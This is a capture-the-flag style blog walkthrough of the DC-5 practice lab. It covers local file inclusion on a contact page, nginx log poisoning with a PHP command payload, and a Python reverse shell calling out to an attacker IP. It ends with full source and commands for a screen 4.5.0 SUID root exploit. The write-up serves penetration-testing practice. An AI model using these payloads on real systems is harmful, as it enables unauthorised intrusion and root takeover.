Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu May 27 05:45:51 2021 as: nmap -sC -p- -sV -oA nmap 172.16.139.185
Nmap scan report for DC-5 (172.16.139.185)
Host is up (0.0015s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47835/udp   status
|   100024  1          51334/udp6  status
|   100024  1          52216/tcp   status
|_  100024  1          54172/tcp6  status
52216/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 05:46:08 2021 -- 1 IP address (1 host up) scanned in 16.99 seconds

Scanning for full ports give us 3 open port but since the lab only focus on the port 80 HTTP let hit it to start enumerating.

image

We are on the webpage let look around and find something vulnerable spend sometime checking so i landed on the contact page.

image

Let try to contact them and also checking for sql injection but nop not the way in so checking the url we have after sending them a mail.

http://172.16.139.186/thankyou.php?firstname=&lastname=&country=australia&subject= looking like LFI right?? sound interesting.

image

Not going to lie getting the right parameter is a really pain but guess what we learn everyday it something simple but my mind was not set there at all so let continue.

http://172.16.139.186/thankyou.php?file=/etc/passwd here the right parameter is file probably by guessing to took me long.

image

LFI To SHELL Through Log Poisoning

We know our web server is Nginx so to poison it is easy since we know the path with the help of little research from google.

let intercept our request with burp and send it to the repeater tab in burp <?php system ($_GET['rev']) ?>

image

Let confirm it if we poisoning it http://172.16.139.186/thankyou.php?file=/var/log/nginx/error.log

image

Boom defintely we do let run some command back to our burp /var/log/nginx/error.log&rev=ls the path am talking about with a little twist that we added to poison the web server.

image

Getting Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

NOTE:- edit the port and IP and also start an Ncat listener now let run it to get our shell.

image

Shell below;

image

Spawning a TTY shell making shell stable also to make so cool to use i know i love using the words cool lol .

python -c'import pty; pty.spawn ("/bin/bash")' and i think we are good to go.

image

Checking all folder found nothing so i decided to check for SUID with find / -perm -u=s -type f 2>/dev/null to list out SUID files.

image

Seems we have /bin/screen-4.5.0 let check for exploit.

image

Nice.

Privilege Escalation

We have to do now is to create the exploit we have already but we some fixing to do.

image

Now let do the right thing.

#include <stdio.h>                                                                 
#include <sys/types.h>       
#include <unistd.h>                                                                                                                                                    
__attribute__ ((__constructor__))                                                                                                                                      
void dropshell(void){                                                                                                                                                  
    chown("/tmp/rootshell", 0, 0);                                                                                                                                     
    chmod("/tmp/rootshell", 04755);                                                                                                                                    
    unlink("/etc/ld.so.preload");                                                                                                                                      
    printf("[+] done!\n");
}          

Let save it in a file name exploit.c

#include <stdio.h>
int main(void){                          
    setuid(0);                                                                     
    setgid(0);
    seteuid(0);                          
    setegid(0);                                                                    
    execvp("/bin/sh", NULL, NULL);
}

Let save in a file name rootshell.c

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell 

Let save it in a file name root.sh

image

Now we need to compile it.

gcc -fPIC -shared -ldl -o libhax.so exploit.c
gcc -o rootshell rootshell.c

image

Now let upload it on the target.

image

We have all files on the target now let give the file with the name root.sh permission chmod +x root.sh now let run it.

image

Rooooooooooooooooooot let now get the flag.txt.

image

Box rooted and we are done.

Greeting From Muzec



Back To Home